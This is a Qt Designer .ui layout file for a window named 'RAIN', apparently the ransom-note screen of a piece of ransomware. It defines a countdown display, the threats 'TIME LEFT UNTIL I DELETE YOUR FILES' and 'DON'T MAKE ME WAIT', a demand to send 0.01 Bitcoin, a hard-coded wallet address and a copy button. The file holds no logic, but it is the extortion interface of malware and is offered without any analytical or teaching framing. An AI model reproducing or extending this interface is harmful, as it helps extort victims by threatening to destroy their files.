<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
 <class>MW_Counter</class>
 <widget class="QMainWindow" name="MW_Counter">
  <property name="geometry">
   <rect>
    <x>0</x>
    <y>0</y>
    <width>789</width>
    <height>450</height>
   </rect>
  </property>
  <property name="windowTitle">
   <string/>
  </property>
  <property name="windowIcon">
   <iconset>
    <normaloff>../../../../../../../../clock.png</normaloff>../../../../../../../../clock.png</iconset>
  </property>
  <property name="styleSheet">
   <string notr="true">background: grey;</string>
  </property>
  <widget class="QWidget" name="centralwidget">
   <layout class="QGridLayout" name="gridLayout">
    <item row="2" column="0">
     <widget class="QLabel" name="LBL_Counter">
      <property name="font">
       <font>
        <family>alarm clock</family>
        <pointsize>80</pointsize>
        <italic>false</italic>
       </font>
      </property>
      <property name="mouseTracking">
       <bool>false</bool>
      </property>
      <property name="styleSheet">
       <string notr="true">background: red;
color: white;
border-style: solid;
border-width: 5px;</string>
      </property>
      <property name="text">
       <string/>
      </property>
      <property name="alignment">
       <set>Qt::AlignCenter</set>
      </property>
     </widget>
    </item>
    <item row="6" column="0">
     <widget class="QLabel" name="LBL_T3">
      <property name="font">
       <font>
        <family>Trebuchet MS</family>
        <pointsize>30</pointsize>
       </font>
      </property>
      <property name="text">
       <string>DON'T MAKE ME WAIT</string>
      </property>
      <property name="alignment">
       <set>Qt::AlignCenter</set>
      </property>
     </widget>
    </item>
    <item row="3" column="0">
     <widget class="QLabel" name="LBL_T2">
      <property name="font">
       <font>
        <family>Trebuchet MS</family>
        <pointsize>20</pointsize>
       </font>
      </property>
      <property name="text">
       <string>TRANSFER 0.01 BITCOIN TO THIS VIRTUAL WALLET</string>
      </property>
      <property name="alignment">
       <set>Qt::AlignCenter</set>
      </property>
     </widget>
    </item>
    <item row="0" column="0">
     <widget class="QLabel" name="LBL_Rain">
      <property name="font">
       <font>
        <family>Doctor Glitch</family>
        <pointsize>60</pointsize>
       </font>
      </property>
      <property name="text">
       <string>RAIN</string>
      </property>
      <property name="alignment">
       <set>Qt::AlignCenter</set>
      </property>
     </widget>
    </item>
    <item row="1" column="0">
     <widget class="QLabel" name="LBL_T1">
      <property name="font">
       <font>
        <family>Trebuchet MS</family>
        <pointsize>30</pointsize>
       </font>
      </property>
      <property name="text">
       <string>TIME LEFT UNTIL I DELETE YOUR FILES</string>
      </property>
      <property name="alignment">
       <set>Qt::AlignCenter</set>
      </property>
     </widget>
    </item>
    <item row="4" column="0">
     <widget class="QLineEdit" name="LE_Wallet">
      <property name="enabled">
       <bool>false</bool>
      </property>
      <property name="font">
       <font>
        <family>Trebuchet MS</family>
        <pointsize>20</pointsize>
       </font>
      </property>
      <property name="cursor">
       <cursorShape>PointingHandCursor</cursorShape>
      </property>
      <property name="text">
       <string>18mB1n8bDXHxie9R4qAqHibUppaiwuQYXK</string>
      </property>
      <property name="alignment">
       <set>Qt::AlignCenter</set>
      </property>
     </widget>
    </item>
    <item row="5" column="0">
     <widget class="QPushButton" name="BTN_Copy">
      <property name="text">
       <string>COPY</string>
      </property>
     </widget>
    </item>
   </layout>
  </widget>
 </widget>
 <resources/>
 <connections/>
</ui>
